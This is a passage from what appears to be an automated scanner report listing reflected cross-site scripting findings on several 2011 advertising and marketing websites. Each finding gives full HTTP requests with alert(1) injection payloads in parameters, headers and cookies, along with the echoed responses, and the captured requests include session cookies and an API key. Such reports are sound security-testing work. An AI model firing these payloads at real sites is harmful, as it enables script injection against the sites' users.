Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:29:02 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:44:02 GMT;path=/
Content-Length: 20694

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Ads clo.gif2112e"style="x:expression(alert(1))"2aaa2fd7024" />
...[SNIP]...

3.114. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74187<a%20b%3dc>5f12c9056f0 was submitted in the REST URL parameter 3. This input was echoed as 74187<a b=c>5f12c9056f0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external/ads/clo.gif74187<a%20b%3dc>5f12c9056f0?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:32 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:29:32 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:44:32 GMT;path=/
Content-Length: 20501

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<span>One sec... we're building clo.gif74187<a b=c>5f12c9056f0 for <strong>
...[SNIP]...

3.115. http://www.silverpop.com/preferences_sf/login.sp [failureHandler parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/login.sp

Issue detail

The value of the failureHandler request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f35f"><script>alert(1)</script>3b6fd41a04e was submitted in the failureHandler parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/login.sp?height=150&width=300&successHandler=Downloads%3DHoliday%20Marketing%20Twists%26DestinationURL%3D/marketing-resources/white-papers/download/confirm.html%26Parameters%3DEmail%2CDownloads%26LeadSource%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download%26PromoCode%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download&failureHandler=7f35f"><script>alert(1)</script>3b6fd41a04e&_=1311364658877 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.silverpop.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:59:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 810
Content-Type: text/html; charset=UTF-8

<form method="post" onsubmit="dynamicLogin(this.Email.value,'Downloads=Holiday Marketing Twists&DestinationURL=/marketing-resources/white-papers/download/confirm.html&Parameters=Email,Downloads&LeadSource=Holiday Marketing Twists White Paper Download&PromoCode=Holiday Marketing Twists White Paper Download','7f35f"><script>alert(1)</script>3b6fd41a04e'); return false;">
...[SNIP]...

3.116. http://www.silverpop.com/preferences_sf/login.sp [successHandler parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/login.sp

Issue detail

The value of the successHandler request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f3da"><script>alert(1)</script>bfa58457b61 was submitted in the successHandler parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/login.sp?height=150&width=300&successHandler=Downloads%3DHoliday%20Marketing%20Twists%26DestinationURL%3D/marketing-resources/white-papers/download/confirm.html%26Parameters%3DEmail%2CDownloads%26LeadSource%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download%26PromoCode%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download7f3da"><script>alert(1)</script>bfa58457b61&failureHandler=&_=1311364658877 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.silverpop.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:58:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 810
Content-Type: text/html; charset=UTF-8

<form method="post" onsubmit="dynamicLogin(this.Email.value,'Downloads=Holiday Marketing Twists&DestinationURL=/marketing-resources/white-papers/download/confirm.html&Parameters=Email,Downloads&LeadSource=Holiday Marketing Twists White Paper Download&PromoCode=Holiday Marketing Twists White Paper Download7f3da"><script>alert(1)</script>bfa58457b61',''); return false;">
...[SNIP]...

3.117. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [&fld[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/prepopulateFields.js.sp

Issue detail

The value of the &fld[] request parameter is copied into the HTML document as plain text between tags. The payload 1cd43<script>alert(1)</script>ec8a814e59f was submitted in the &fld[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName1cd43<script>alert(1)</script>ec8a814e59f&fld[]=LastName&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364459504 HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 305
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName1cd43<script>alert(1)</script>ec8a814e59f': '',
'LastName': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',
'CurrentDeployment': '',
'Timeframe
...[SNIP]...

3.118. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [fld[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/prepopulateFields.js.sp

Issue detail

The value of the fld[] request parameter is copied into the HTML document as plain text between tags. The payload 6bdab<script>alert(1)</script>dffdd7b3753 was submitted in the fld[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName&fld[]=LastName6bdab<script>alert(1)</script>dffdd7b3753&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364459504 HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 305
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName': '',
'LastName6bdab<script>alert(1)</script>dffdd7b3753': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',
'CurrentDeployment': '',
'Timeframe': '',
'': ''
})
...[SNIP]...

3.119. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d670d<script>alert(1)</script>b99a9855237 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: d670d<script>alert(1)</script>b99a9855237
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=...[SNIP]...; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 04:31:24 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: d670d<script>alert(1)</script>b99a9855237

3.120. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a3e'%3balert(1)//6c633eca4ea was submitted in the cli cookie. This input was echoed as f1a3e';alert(1)//6c633eca4ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83cf1a3e'%3balert(1)//6c633eca4ea; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8525
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
anguage="Javascript">CollectiveMedia.createAndAttachAd("cm-10118186198_1311271253","http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10118186198_1311271253,11fda490648f83cf1a3e';alert(1)//6c633eca4ea&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10118186198_1311271253%2C11fda490648f83cf1a3e%27%3Baler
...[SNIP]...

3.121. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8adf7"%3balert(1)//1d3130726fc was submitted in the cli cookie. This input was echoed as 8adf7";alert(1)//1d3130726fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c8adf7"%3balert(1)//1d3130726fc; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8525
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=526077459;redirect=http://a.collective-media.net/datapair?net=qc&id=11fda490648f83c8adf7";alert(1)//1d3130726fc&segs=!qcsegs&op=add",true);CollectiveMedia.addPixel("http://load.exelator.com/load/?p=104&g=210&j=0",false);CollectiveMedia.addPixel("http://ws.visualdna.com/syncs/collective",false);CollectiveMedia.a
...[SNIP]...

3.122. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1e5de<script>alert(1)</script>ffc4383bf9a was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=11e5de<script>alert(1)</script>ffc4383bf9a; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:39 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '11e5de<script>alert(1)</script>ffc4383bf9a', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27
...[SNIP]...

3.123. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload bb9ff<script>alert(1)</script>1dc8b182675 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258bb9ff<script>alert(1)</script>1dc8b182675; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:39 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
false);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1311271258bb9ff<script>alert(1)</script>1dc8b182675', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060":
...[SNIP]...

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 68388<script>alert(1)</script>e06b9decce1 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-131127126968388<script>alert(1)</script>e06b9decce1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:40 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
"BMX_G": 'method->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-131127126968388<script>alert(1)</script>e06b9decce1', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu
...[SNIP]...

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

